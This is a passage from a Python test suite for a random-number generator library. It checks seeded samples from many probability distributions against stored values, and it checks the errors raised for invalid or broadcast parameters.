assert_no_warnings(random.multivariate_normal, mean, cov, check_valid="ignore")
# and that it raises with RuntimeWarning check_valid="raises"
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="raise"
)
cov = np.array([[1, 0.1], [0.1, 1]], dtype=np.float32)
with suppress_warnings() as sup:
random.multivariate_normal(mean, cov)
w = sup.record(RuntimeWarning)
assert len(w) == 0
mu = np.zeros(2)
cov = np.eye(2)
assert_raises(
ValueError, random.multivariate_normal, mean, cov, check_valid="other"
)
assert_raises(ValueError, random.multivariate_normal, np.zeros((2, 1, 1)), cov)
assert_raises(ValueError, random.multivariate_normal, mu, np.empty((3, 2)))
assert_raises(ValueError, random.multivariate_normal, mu, np.eye(3))
def test_negative_binomial(self):
random.bit_generator.seed(self.seed)
actual = random.negative_binomial(n=100, p=0.12345, size=(3, 2))
desired = np.array([[521, 736], [665, 690], [723, 751]])
assert_array_equal(actual, desired)
def test_negative_binomial_exceptions(self):
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.negative_binomial, 100, np.nan)
assert_raises(ValueError, random.negative_binomial, 100, [np.nan] * 10)
def test_noncentral_chisquare(self):
random.bit_generator.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=5, size=(3, 2))
desired = np.array(
[
[9.47783251920357, 10.02066178260461],
[3.15869984192364, 10.5581565031544],
[5.01652540543548, 13.7689551218441],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
actual = random.noncentral_chisquare(df=0.5, nonc=0.2, size=(3, 2))
desired = np.array(
[
[0.00145153051285, 0.22432468724778],
[0.02956713468556, 0.00207192946898],
[1.41985055641800, 0.15451287602753],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
random.bit_generator.seed(self.seed)
actual = random.noncentral_chisquare(df=5, nonc=0, size=(3, 2))
desired = np.array(
[
[3.64881368071039, 5.48224544747803],
[20.41999842025404, 3.44075915187367],
[1.29765160605552, 1.64125033268606],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f(self):
random.bit_generator.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=1, size=(3, 2))
desired = np.array(
[
[1.22680230963236, 2.56457837623956],
[2.7653304499494, 7.4336268865443],
[1.16362730891403, 2.54104276581491],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_noncentral_f_nan(self):
random.bit_generator.seed(self.seed)
actual = random.noncentral_f(dfnum=5, dfden=2, nonc=np.nan)
assert np.isnan(actual)
def test_normal(self):
random.bit_generator.seed(self.seed)
actual = random.normal(loc=0.123456789, scale=2.0, size=(3, 2))
desired = np.array(
[
[-6.822051212221923, -0.094420339458285],
[-0.368474717792823, -1.284746311523402],
[0.843661763232711, 0.379120992544734],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_normal_0(self):
assert_equal(random.normal(scale=0), 0)
assert_raises(ValueError, random.normal, scale=-0.0)
def test_pareto(self):
random.bit_generator.seed(self.seed)
actual = random.pareto(a=0.123456789, size=(3, 2))
desired = np.array(
[
[5.6883528121891552e16, 4.0569373841667057e03],
[1.2854967019379475e12, 6.5833156486851483e04],
[1.1281132447159091e01, 3.1895968171107006e08],
]
)
# For some reason on 32-bit x86 Ubuntu 12.10 the [1, 0] entry in this
# matrix differs by 24 nulps. Discussion:
# https://mail.python.org/pipermail/numpy-discussion/2012-September/063801.html
# Consensus is that this is probably some gcc quirk that affects
# rounding but not in any important way, so we just use a looser
# tolerance on this test:
np.testing.assert_array_almost_equal_nulp(actual, desired, nulp=30)
def test_poisson(self):
random.bit_generator.seed(self.seed)
actual = random.poisson(lam=0.123456789, size=(3, 2))
desired = np.array([[0, 0], [1, 0], [0, 0]])
assert_array_equal(actual, desired)
def test_poisson_exceptions(self):
lambig = np.iinfo("int64").max
lamneg = -1
assert_raises(ValueError, random.poisson, lamneg)
assert_raises(ValueError, random.poisson, [lamneg] * 10)
assert_raises(ValueError, random.poisson, lambig)
assert_raises(ValueError, random.poisson, [lambig] * 10)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, random.poisson, np.nan)
assert_raises(ValueError, random.poisson, [np.nan] * 10)
def test_power(self):
random.bit_generator.seed(self.seed)
actual = random.power(a=0.123456789, size=(3, 2))
desired = np.array(
[
[9.328833342693975e-01, 2.742250409261003e-02],
[7.684513237993961e-01, 9.297548209160028e-02],
[2.214811188828573e-05, 4.693448360603472e-01],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_rayleigh(self):
random.bit_generator.seed(self.seed)
actual = random.rayleigh(scale=10, size=(3, 2))
desired = np.array(
[
[13.8882496494248393, 13.383318339044731],
[20.95413364294492098, 21.08285015800712614],
[11.06066537006854311, 17.35468505778271009],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_rayleigh_0(self):
assert_equal(random.rayleigh(scale=0), 0)
assert_raises(ValueError, random.rayleigh, scale=-0.0)
def test_standard_cauchy(self):
random.bit_generator.seed(self.seed)
actual = random.standard_cauchy(size=(3, 2))
desired = np.array(
[
[31.87809592667601, 0.349332782046838],
[2.816995747731641, 10.552372563459114],
[2.485608017991235, 7.843211273201831],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_exponential(self):
random.bit_generator.seed(self.seed)
actual = random.standard_exponential(size=(3, 2), method="inv")
desired = np.array(
[
[0.96441739162374596, 0.89556604882105506],
[2.1953785836319808, 2.22243285392490542],
[0.6116915921431676, 1.50592546727413201],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_expoential_type_error(self):
assert_raises(TypeError, random.standard_exponential, dtype=np.int32)
def test_standard_gamma(self):
random.bit_generator.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array(
[
[2.28483515569645, 3.29899524967824],
[11.12492298902645, 2.16784417297277],
[0.92121813690910, 1.12853552328470],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_standard_gammma_scalar_float(self):
random.bit_generator.seed(self.seed)
actual = random.standard_gamma(3, dtype=np.float32)
desired = 1.3877466
assert_array_almost_equal(actual, desired, decimal=6)
def test_standard_gamma_float(self):
random.bit_generator.seed(self.seed)
actual = random.standard_gamma(shape=3, size=(3, 2))
desired = np.array(
[[2.2848352, 3.2989952], [11.124923, 2.1678442], [0.9212181, 1.1285355]]
)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gammma_float_out(self):
actual = np.zeros((3, 2), dtype=np.float32)
random.bit_generator.seed(self.seed)
random.standard_gamma(10.0, out=actual, dtype=np.float32)
desired = np.array(
[[6.9824033, 7.3731737], [14.860578, 7.5327270], [11.767487, 6.2320185]],
dtype=np.float32,
)
assert_array_almost_equal(actual, desired, decimal=5)
random.bit_generator.seed(self.seed)
random.standard_gamma(10.0, out=actual, size=(3, 2), dtype=np.float32)
assert_array_almost_equal(actual, desired, decimal=5)
def test_standard_gamma_unknown_type(self):
assert_raises(TypeError, random.standard_gamma, 1.0, dtype="int32")
def test_out_size_mismatch(self):
out = np.zeros(10)
assert_raises(ValueError, random.standard_gamma, 10.0, size=20, out=out)
assert_raises(ValueError, random.standard_gamma, 10.0, size=(10, 1), out=out)
def test_standard_gamma_0(self):
assert_equal(random.standard_gamma(shape=0), 0)
assert_raises(ValueError, random.standard_gamma, shape=-0.0)
def test_standard_normal(self):
random.bit_generator.seed(self.seed)
actual = random.standard_normal(size=(3, 2))
desired = np.array(
[
[-3.472754000610961, -0.108938564229143],
[-0.245965753396411, -0.704101550261701],
[0.360102487116356, 0.127832101772367],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_standard_normal_unsupported_type(self):
assert_raises(TypeError, random.standard_normal, dtype=np.int32)
def test_standard_t(self):
random.bit_generator.seed(self.seed)
actual = random.standard_t(df=10, size=(3, 2))
desired = np.array(
[
[-3.68722108185508, -0.672031186266171],
[2.900224996448669, -0.199656996187739],
[-1.12179956985969, 1.85668262342106],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_triangular(self):
random.bit_generator.seed(self.seed)
actual = random.triangular(left=5.12, mode=10.23, right=20.34, size=(3, 2))
desired = np.array(
[
[12.68117178949215784, 12.4129206149193152],
[16.20131377335158263, 16.25692138747600524],
[11.20400690911820263, 14.4978144835829923],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_uniform(self):
random.bit_generator.seed(self.seed)
actual = random.uniform(low=1.23, high=10.54, size=(3, 2))
desired = np.array(
[
[6.99097932346268003, 6.73801597444323974],
[9.50364421400426274, 9.53130618907631089],
[5.48995325769805476, 8.47493103280052118],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_uniform_range_bounds(self):
fmin = np.finfo("float").min
fmax = np.finfo("float").max
func = random.uniform
assert_raises(OverflowError, func, -np.inf, 0)
assert_raises(OverflowError, func, 0, np.inf)
assert_raises(OverflowError, func, fmin, fmax)
assert_raises(OverflowError, func, [-np.inf], [0])
assert_raises(OverflowError, func, [0], [np.inf])
# (fmax / 1e17) - fmin is within range, so this should not throw
# account for i386 extended precision DBL_MAX / 1e17 + DBL_MAX >
# DBL_MAX by increasing fmin a bit
random.uniform(low=np.nextafter(fmin, 1), high=fmax / 1e17)
def test_uniform_neg_range(self):
func = random.uniform
assert_raises(ValueError, func, 2, 1)
assert_raises(ValueError, func, [1, 2], [1, 1])
assert_raises(ValueError, func, [[0, 1], [2, 3]], 2)
def test_scalar_exception_propagation(self):
# Tests that exceptions are correctly propagated in distributions
# when called with objects that throw exceptions when converted to
# scalars.
#
# Regression test for gh: 8865
class ThrowingFloat(np.ndarray):
def __float__(self):
raise TypeError
throwing_float = np.array(1.0).view(ThrowingFloat)
assert_raises(TypeError, random.uniform, throwing_float, throwing_float)
class ThrowingInteger(np.ndarray):
def __int__(self):
raise TypeError
throwing_int = np.array(1).view(ThrowingInteger)
assert_raises(TypeError, random.hypergeometric, throwing_int, 1, 1)
def test_vonmises(self):
random.bit_generator.seed(self.seed)
actual = random.vonmises(mu=1.23, kappa=1.54, size=(3, 2))
desired = np.array(
[
[2.28567572673902042, 2.89163838442285037],
[0.38198375564286025, 2.57638023113890746],
[1.19153771588353052, 1.83509849681825354],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_vonmises_small(self):
# check infinite loop, gh-4720
random.bit_generator.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=1.1e-8, size=10 ** 6)
assert_(np.isfinite(r).all())
def test_vonmises_nan(self):
random.bit_generator.seed(self.seed)
r = random.vonmises(mu=0.0, kappa=np.nan)
assert_(np.isnan(r))
def test_wald(self):
random.bit_generator.seed(self.seed)
actual = random.wald(mean=1.23, scale=1.54, size=(3, 2))
desired = np.array(
[
[0.10653278160339, 0.98771068102461],
[0.89276055317879, 0.13640126419923],
[0.9194319091599, 0.36037816317472],
]
)
assert_array_almost_equal(actual, desired, decimal=14)
def test_weibull(self):
random.bit_generator.seed(self.seed)
actual = random.weibull(a=1.23, size=(3, 2))
desired = np.array(
[
[3.557276979846361, 1.020870580998542],
[2.731847777612348, 1.29148068905082],
[0.385531483942839, 2.049551716717254],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
def test_weibull_0(self):
random.bit_generator.seed(self.seed)
assert_equal(random.weibull(a=0, size=12), np.zeros(12))
assert_raises(ValueError, random.weibull, a=-0.0)
def test_zipf(self):
random.bit_generator.seed(self.seed)
actual = random.zipf(a=1.23, size=(3, 2))
desired = np.array([[66, 29], [1, 1], [3, 13]])
assert_array_equal(actual, desired)
def test_complex_normal(self):
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=1.0, gamma=1.0, relation=0.5, size=(3, 2))
desired = np.array(
[
[
-2.007493185623132 - 0.05446928211457126j,
0.7869874090977291 - 0.35205077513085050j,
],
[
1.3118579018087224 + 0.06391605088618339j,
3.5872278793967554 + 0.14155458439717636j,
],
[
0.7170022862582056 - 0.06573393915140235j,
-0.26571837106621987 - 0.0931713830979103j,
],
]
)
assert_array_almost_equal(actual, desired, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=0, gamma=1.0, relation=0.5, size=3)
assert_array_almost_equal(actual, desired.flat[:3] - 1.0, decimal=15)
random.bit_generator.seed(self.seed)
actual = random.complex_normal(loc=2.0, gamma=1.0, relation=0.5)
assert_array_almost_equal(actual, 1.0 + desired[0, 0], decimal=15)
def test_complex_normal_invalid(self):
assert_raises(ValueError, random.complex_normal, gamma=1 + 0.5j)
assert_raises(ValueError, random.complex_normal, relation=2)
assert_raises(ValueError, random.complex_normal, relation=-3)
assert_raises(ValueError, random.complex_normal, relation=10j)
assert_raises(ValueError, random.complex_normal, gamma=[1 + 0.5j])
assert_raises(ValueError, random.complex_normal, relation=[2])
assert_raises(ValueError, random.complex_normal, relation=[-3])
assert_raises(ValueError, random.complex_normal, relation=[10j])
class TestBroadcast(object):
# tests that functions that broadcast behave
# correctly when presented with non-scalar arguments
def setup(self):
self.seed = 123456789
def set_seed(self):
random.bit_generator.seed(self.seed)
def test_uniform(self):
low = [0]
high = [1]
uniform = random.uniform
desired = np.array(
[0.53283302478975902, 0.53413660089041659, 0.50955303552646702]
)
self.set_seed()
actual = uniform(low * 3, high)
assert_array_almost_equal(actual, desired, decimal=14)
self.set_seed()
actual = uniform(low, high * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_normal(self):
loc = [0]
scale = [1]
bad_scale = [-1]
normal = random.normal
desired = np.array([0.454879818179180, -0.62749179463661, -0.06063266769872])
self.set_seed()
actual = normal(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc * 3, bad_scale)
assert_raises(ValueError, random.normal, loc * 3, bad_scale)
self.set_seed()
actual = normal(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, normal, loc, bad_scale * 3)
assert_raises(ValueError, random.normal, loc, bad_scale * 3)
def test_beta(self):
a = [1]
b = [2]
bad_a = [-1]
bad_b = [-2]
beta = random.beta
desired = np.array([0.63222080311226, 0.33310522220774, 0.64494078460190])
self.set_seed()
actual = beta(a * 3, b)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, beta, bad_a * 3, b)
assert_raises(ValueError, beta, a * 3, bad_b)
self.set_seed()
actual = beta(a, b * 3)
assert_array_almost_equal(actual, desired, decimal=14)
def test_exponential(self):
scale = [1]
bad_scale = [-1]
exponential = random.exponential
desired = np.array([1.68591211640990, 3.14186859487914, 0.67717375919228])
self.set_seed()
actual = exponential(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, exponential, bad_scale * 3)
def test_standard_gamma(self):
shape = [1]
bad_shape = [-1]
std_gamma = random.standard_gamma
desired = np.array([1.68591211640990, 3.14186859487914, 0.67717375919228])
self.set_seed()
actual = std_gamma(shape * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, std_gamma, bad_shape * 3)
def test_gamma(self):
shape = [1]
scale = [2]
bad_shape = [-1]
bad_scale = [-2]
gamma = random.gamma
desired = np.array([3.37182423281980, 6.28373718975827, 1.35434751838456])
self.set_seed()
actual = gamma(shape * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape * 3, scale)
assert_raises(ValueError, gamma, shape * 3, bad_scale)
self.set_seed()
actual = gamma(shape, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gamma, bad_shape, scale * 3)
assert_raises(ValueError, gamma, shape, bad_scale * 3)
def test_f(self):
dfnum = [1]
dfden = [2]
bad_dfnum = [-1]
bad_dfden = [-2]
f = random.f
desired = np.array([0.84207044881810, 3.08607209903483, 3.12823105933169])
self.set_seed()
actual = f(dfnum * 3, dfden)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum * 3, dfden)
assert_raises(ValueError, f, dfnum * 3, bad_dfden)
self.set_seed()
actual = f(dfnum, dfden * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, f, bad_dfnum, dfden * 3)
assert_raises(ValueError, f, dfnum, bad_dfden * 3)
def test_noncentral_f(self):
dfnum = [2]
dfden = [3]
nonc = [4]
bad_dfnum = [0]
bad_dfden = [-1]
bad_nonc = [-2]
nonc_f = random.noncentral_f
desired = np.array([3.83710578542563, 8.74926819712029, 0.48892943835401])
self.set_seed()
actual = nonc_f(dfnum * 3, dfden, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert np.all(np.isnan(nonc_f(dfnum, dfden, [np.nan] * 3)))
assert_raises(ValueError, nonc_f, bad_dfnum * 3, dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, bad_dfden, nonc)
assert_raises(ValueError, nonc_f, dfnum * 3, dfden, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden * 3, nonc)
assert_raises(ValueError, nonc_f, dfnum, dfden * 3, bad_nonc)
self.set_seed()
actual = nonc_f(dfnum, dfden, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_f, bad_dfnum, dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, bad_dfden, nonc * 3)
assert_raises(ValueError, nonc_f, dfnum, dfden, bad_nonc * 3)
def test_noncentral_f_small_df(self):
self.set_seed()
desired = np.array([21.57878070681719, 1.17110217503908])
actual = random.noncentral_f(0.9, 0.9, 2, size=2)
assert_array_almost_equal(actual, desired, decimal=14)
def test_chisquare(self):
df = [1]
bad_df = [-1]
chisquare = random.chisquare
desired = np.array(
[0.57022801133088286, 0.51947702108840776, 0.1320969254923558]
)
self.set_seed()
actual = chisquare(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, chisquare, bad_df * 3)
def test_noncentral_chisquare(self):
df = [1]
nonc = [2]
bad_df = [-1]
bad_nonc = [-2]
nonc_chi = random.noncentral_chisquare
desired = np.array([2.20478739452297, 1.45177405755115, 1.00418921695354])
self.set_seed()
actual = nonc_chi(df * 3, nonc)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df * 3, nonc)
assert_raises(ValueError, nonc_chi, df * 3, bad_nonc)
self.set_seed()
actual = nonc_chi(df, nonc * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, nonc_chi, bad_df, nonc * 3)
assert_raises(ValueError, nonc_chi, df, bad_nonc * 3)
def test_standard_t(self):
df = [1]
bad_df = [-1]
t = random.standard_t
desired = np.array([0.60081050724244, -0.90380889829210, -0.64499590504117])
self.set_seed()
actual = t(df * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, t, bad_df * 3)
assert_raises(ValueError, random.standard_t, bad_df * 3)
def test_vonmises(self):
mu = [2]
kappa = [1]
bad_kappa = [-1]
vonmises = random.vonmises
desired = np.array(
[2.9883443664201312, -2.7064099483995943, -1.8672476700665914]
)
self.set_seed()
actual = vonmises(mu * 3, kappa)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu * 3, bad_kappa)
self.set_seed()
actual = vonmises(mu, kappa * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, vonmises, mu, bad_kappa * 3)
def test_pareto(self):
a = [1]
bad_a = [-1]
pareto = random.pareto
desired = np.array([4.397371719158540, 22.14707898642946, 0.968306954322200])
self.set_seed()
actual = pareto(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, pareto, bad_a * 3)
assert_raises(ValueError, random.pareto, bad_a * 3)
def test_weibull(self):
a = [1]
bad_a = [-1]
weibull = random.weibull
desired = np.array([1.68591211640990, 3.14186859487914, 0.67717375919228])
self.set_seed()
actual = weibull(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, weibull, bad_a * 3)
assert_raises(ValueError, random.weibull, bad_a * 3)
def test_power(self):
a = [1]
bad_a = [-1]
power = random.power
desired = np.array([0.81472463783615, 0.95679800459547, 0.49194916077287])
self.set_seed()
actual = power(a * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, power, bad_a * 3)
assert_raises(ValueError, random.power, bad_a * 3)
def test_laplace(self):
loc = [0]
scale = [1]
bad_scale = [-1]
laplace = random.laplace
desired = np.array(
[0.067921356028507157, 0.070715642226971326, 0.019290950698972624]
)
self.set_seed()
actual = laplace(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc * 3, bad_scale)
self.set_seed()
actual = laplace(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, laplace, loc, bad_scale * 3)
def test_gumbel(self):
loc = [0]
scale = [1]
bad_scale = [-1]
gumbel = random.gumbel
desired = np.array(
[0.2730318639556768, 0.26936705726291116, 0.33906220393037939]
)
self.set_seed()
actual = gumbel(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc * 3, bad_scale)
self.set_seed()
actual = gumbel(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, gumbel, loc, bad_scale * 3)
def test_logistic(self):
loc = [0]
scale = [1]
bad_scale = [-1]
logistic = random.logistic
desired = np.array(
[0.13152135837586171, 0.13675915696285773, 0.038216792802833396]
)
self.set_seed()
actual = logistic(loc * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc * 3, bad_scale)
self.set_seed()
actual = logistic(loc, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, logistic, loc, bad_scale * 3)
assert_equal(random.logistic(1.0, 0.0), 1.0)
def test_lognormal(self):
mean = [0]
sigma = [1]
bad_sigma = [-1]
lognormal = random.lognormal
desired = np.array([1.57598396702930, 0.53392932731280, 0.94116889802361])
self.set_seed()
actual = lognormal(mean * 3, sigma)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean * 3, bad_sigma)
assert_raises(ValueError, random.lognormal, mean * 3, bad_sigma)
self.set_seed()
actual = lognormal(mean, sigma * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, lognormal, mean, bad_sigma * 3)
assert_raises(ValueError, random.lognormal, mean, bad_sigma * 3)
def test_rayleigh(self):
scale = [1]
bad_scale = [-1]
rayleigh = random.rayleigh
desired = np.array([1.2337491937897689, 1.2360119924878694, 1.1936818095781789])
self.set_seed()
actual = rayleigh(scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, rayleigh, bad_scale * 3)
def test_wald(self):
mean = [0.5]
scale = [1]
bad_mean = [0]
bad_scale = [-2]
wald = random.wald
desired = np.array([0.36297361471752, 0.52190135028254, 0.55111022040727])
self.set_seed()
actual = wald(mean * 3, scale)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean * 3, scale)
assert_raises(ValueError, wald, mean * 3, bad_scale)
assert_raises(ValueError, random.wald, bad_mean * 3, scale)
assert_raises(ValueError, random.wald, mean * 3, bad_scale)
self.set_seed()
actual = wald(mean, scale * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, wald, bad_mean, scale * 3)
assert_raises(ValueError, wald, mean, bad_scale * 3)
assert_raises(ValueError, random.wald, bad_mean, scale * 3)
assert_raises(ValueError, random.wald, mean, bad_scale * 3)
def test_triangular(self):
left = [1]
right = [3]
mode = [2]
bad_left_one = [3]
bad_mode_one = [4]
bad_left_two, bad_mode_two = right * 2
triangular = random.triangular
desired = np.array([2.03339048710429, 2.0347400359389356, 2.0095991069536208])
self.set_seed()
actual = triangular(left * 3, mode, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one * 3, mode, right)
assert_raises(ValueError, triangular, left * 3, bad_mode_one, right)
assert_raises(ValueError, triangular, bad_left_two * 3, bad_mode_two, right)
self.set_seed()
actual = triangular(left, mode * 3, right)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode * 3, right)
assert_raises(ValueError, triangular, left, bad_mode_one * 3, right)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two * 3, right)
self.set_seed()
actual = triangular(left, mode, right * 3)
assert_array_almost_equal(actual, desired, decimal=14)
assert_raises(ValueError, triangular, bad_left_one, mode, right * 3)
assert_raises(ValueError, triangular, left, bad_mode_one, right * 3)
assert_raises(ValueError, triangular, bad_left_two, bad_mode_two, right * 3)
assert_raises(ValueError, triangular, 10.0, 0.0, 20.0)
assert_raises(ValueError, triangular, 10.0, 25.0, 20.0)
assert_raises(ValueError, triangular, 10.0, 10.0, 10.0)
def test_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
binom = random.binomial
desired = np.array([1, 1, 1])
self.set_seed()
actual = binom(n * 3, p)
assert_array_equal(actual, desired)
self.set_seed()
actual = binom(n * 3, p, size=(3,))
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n * 3, p)
assert_raises(ValueError, binom, n * 3, bad_p_one)
assert_raises(ValueError, binom, n * 3, bad_p_two)
self.set_seed()
actual = binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, binom, bad_n, p * 3)
assert_raises(ValueError, binom, n, bad_p_one * 3)
assert_raises(ValueError, binom, n, bad_p_two * 3)
def test_negative_binomial(self):
n = [1]
p = [0.5]
bad_n = [-1]
bad_p_one = [-1]
bad_p_two = [1.5]
neg_binom = random.negative_binomial
desired = np.array([3, 1, 2], dtype=np.int64)
self.set_seed()
actual = neg_binom(n * 3, p)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n * 3, p)
assert_raises(ValueError, neg_binom, n * 3, bad_p_one)
assert_raises(ValueError, neg_binom, n * 3, bad_p_two)
self.set_seed()
actual = neg_binom(n, p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, neg_binom, bad_n, p * 3)
assert_raises(ValueError, neg_binom, n, bad_p_one * 3)
assert_raises(ValueError, neg_binom, n, bad_p_two * 3)
def test_poisson(self):
max_lam = random._poisson_lam_max
lam = [1]
bad_lam_one = [-1]
bad_lam_two = [max_lam * 2]
poisson = random.poisson
desired = np.array([1, 1, 0])
self.set_seed()
actual = poisson(lam * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, poisson, bad_lam_one * 3)
assert_raises(ValueError, poisson, bad_lam_two * 3)
def test_zipf(self):
a = [2]
bad_a = [0]
zipf = random.zipf
desired = np.array([2, 2, 1])
self.set_seed()
actual = zipf(a * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, zipf, bad_a * 3)
with np.errstate(invalid="ignore"):
assert_raises(ValueError, zipf, np.nan)
assert_raises(ValueError, zipf, [0, 0, np.nan])
def test_geometric(self):
p = [0.5]
bad_p_one = [-1]
bad_p_two = [1.5]
geom = random.geometric
desired = np.array([2, 2, 2])
self.set_seed()
actual = geom(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, geom, bad_p_one * 3)
assert_raises(ValueError, geom, bad_p_two * 3)
def test_hypergeometric(self):
ngood = [1]
nbad = [2]
nsample = [2]
bad_ngood = [-1]
bad_nbad = [-2]
bad_nsample_one = [-1]
bad_nsample_two = [4]
desired = np.array([0, 0, 1])
random = Generator(MT19937(self.seed, mode="legacy"))
actual = random.hypergeometric(ngood * 3, nbad, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood * 3, nbad, nsample)
assert_raises(ValueError, random.hypergeometric, ngood * 3, bad_nbad, nsample)
assert_raises(
ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_one
)
assert_raises(
ValueError, random.hypergeometric, ngood * 3, nbad, bad_nsample_two
)
random = Generator(MT19937(self.seed, mode="legacy"))
actual = random.hypergeometric(ngood, nbad * 3, nsample)
assert_array_equal(actual, desired)
assert_raises(ValueError, random.hypergeometric, bad_ngood, nbad * 3, nsample)
assert_raises(ValueError, random.hypergeometric, ngood, bad_nbad * 3, nsample)
assert_raises(
ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_one
)
assert_raises(
ValueError, random.hypergeometric, ngood, nbad * 3, bad_nsample_two
)
random = Generator(MT19937(self.seed, mode="legacy"))
hypergeom = random.hypergeometric
actual = hypergeom(ngood, nbad, nsample * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, hypergeom, bad_ngood, nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, bad_nbad, nsample * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_one * 3)
assert_raises(ValueError, hypergeom, ngood, nbad, bad_nsample_two * 3)
assert_raises(ValueError, hypergeom, -1, 10, 20)
assert_raises(ValueError, hypergeom, 10, -1, 20)
assert_raises(ValueError, hypergeom, 10, 10, -1)
assert_raises(ValueError, hypergeom, 10, 10, 25)
# ValueError for arguments that are too big.
assert_raises(ValueError, hypergeom, 2 ** 30, 10, 20)
assert_raises(ValueError, hypergeom, 999, 2 ** 31, 50)
assert_raises(ValueError, hypergeom, 999, [2 ** 29, 2 ** 30], 1000)
def test_logseries(self):
p = [0.5]
bad_p_one = [2]
bad_p_two = [-1]
logseries = random.logseries
desired = np.array([1, 1, 1])
self.set_seed()
actual = logseries(p * 3)
assert_array_equal(actual, desired)
assert_raises(ValueError, logseries, bad_p_one * 3)
assert_raises(ValueError, logseries, bad_p_two * 3)
def test_complex_normal(self):
random.bit_generator.seed(self.seed)
loc = np.ones((1, 2))
